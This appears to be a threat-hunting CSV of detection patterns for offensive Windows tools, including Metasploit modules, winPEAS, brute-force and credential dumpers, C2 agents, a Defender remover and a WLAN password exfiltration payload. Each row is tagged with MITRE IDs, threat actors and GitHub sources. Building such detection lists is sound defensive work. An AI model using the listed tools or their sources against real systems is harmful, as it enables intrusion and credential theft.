"*/Win7ElevateDll*",".{0,1000}\/Win7ElevateDll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12584"
"*/WinBruteLogon*",".{0,1000}\/WinBruteLogon.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","12586"
"*/win-brute-logon*",".{0,1000}\/win\-brute\-logon.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","12587"
"*/win-brute-logon.git*",".{0,1000}\/win\-brute\-logon\.git.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","1","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","12588"
"*/WinBruteLogon.zip*",".{0,1000}\/WinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","12589"
"*/windapsearch.git*",".{0,1000}\/windapsearch\.git.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","12590"
"*/windapsearch.py*",".{0,1000}\/windapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","12591"
"*/windapsearch_*.txt*",".{0,1000}\/windapsearch_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","12592"
"*/WindDef_WebInstall.hta*",".{0,1000}\/WindDef_WebInstall\.hta.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","12593"
"*/windows/dcerpc*",".{0,1000}\/windows\/dcerpc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12594"
"*/windows/gather/netripper*",".{0,1000}\/windows\/gather\/netripper.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","12595"
"*/windows_autologin.rb*",".{0,1000}\/windows_autologin\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12596"
"*/windows_downdate.py*",".{0,1000}\/windows_downdate\.py.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","12597"
"*/Windows_MSKSSRV_LPE_CVE-2023-36802.git*",".{0,1000}\/Windows_MSKSSRV_LPE_CVE\-2023\-36802\.git.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","1","N/A","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","12598"
"*/windows_x64_admin.exe*",".{0,1000}\/windows_x64_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","12599"
"*/windows_x64_agent.exe*",".{0,1000}\/windows_x64_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","12600"
"*/windows_x86_admin.exe*",".{0,1000}\/windows_x86_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","12601"
"*/windows_x86_agent.exe*",".{0,1000}\/windows_x86_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","12602"
"*/windows-defender-remover.git*",".{0,1000}\/windows\-defender\-remover\.git.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","12603"
"*/windows-defender-remover/releases/download/*",".{0,1000}\/windows\-defender\-remover\/releases\/download\/.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","12604"
"*/windows-defender-remover/tarball/*",".{0,1000}\/windows\-defender\-remover\/tarball\/.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","12605"
"*/windows-defender-remover/zipball/*",".{0,1000}\/windows\-defender\-remover\/zipball\/.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","12606"
"*/WindowsDowndate.git*",".{0,1000}\/WindowsDowndate\.git.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","12607"
"*/windows-login-phish*",".{0,1000}\/windows\-login\-phish.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","N/A","1","17","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z","12608"
"*/windows-lpe-template*",".{0,1000}\/windows\-lpe\-template.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12609"
"*/Windows-Passwords.ps1*",".{0,1000}\/Windows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","12610"
"*/windows-resources/hyperion*",".{0,1000}\/windows\-resources\/hyperion.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12611"
"*/WindowsVault.cna*",".{0,1000}\/WindowsVault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","12612"
"*/WindowsVault.h*",".{0,1000}\/WindowsVault\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","12613"
"*/win-enum-resources*",".{0,1000}\/win\-enum\-resources.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","12614"
"*/winexe *--runas*",".{0,1000}\/winexe\s.{0,1000}\-\-runas.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","12615"
"*/winexe -U *",".{0,1000}\/winexe\s\-U\s.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","12616"
"*/winexe.git*",".{0,1000}\/winexe\.git.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","12617"
"*/winexe-0.91.tar.gz*",".{0,1000}\/winexe\-0\.91\.tar\.gz.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","12618"
"*/winexe-1.00.tar.gz*",".{0,1000}\/winexe\-1\.00\.tar\.gz.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","12619"
"*/WINHELLO2hashcat.py*",".{0,1000}\/WINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","12620"
"*/win-key-killer.ps1*",".{0,1000}\/win\-key\-killer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","12621"
"*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12622"
"*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12623"
"*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12624"
"*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12625"
"*/winPEAS.exe*",".{0,1000}\/winPEAS\.exe.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12626"
"*/winPEAS.ps1*",".{0,1000}\/winPEAS\.ps1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12627"
"*/winPEASany.exe*",".{0,1000}\/winPEASany\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12628"
"*/winPEASany.exe*",".{0,1000}\/winPEASany\.exe.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12629"
"*/winPEASany_ofs.exe*",".{0,1000}\/winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12630"
"*/winPEASany_ofs.exe*",".{0,1000}\/winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12631"
"*/winPEAS-Obfuscated.exe*",".{0,1000}\/winPEAS\-Obfuscated\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12632"
"*/winPEASx64.exe*",".{0,1000}\/winPEASx64\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12633"
"*/winPEASx86.exe*",".{0,1000}\/winPEASx86\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","12634"
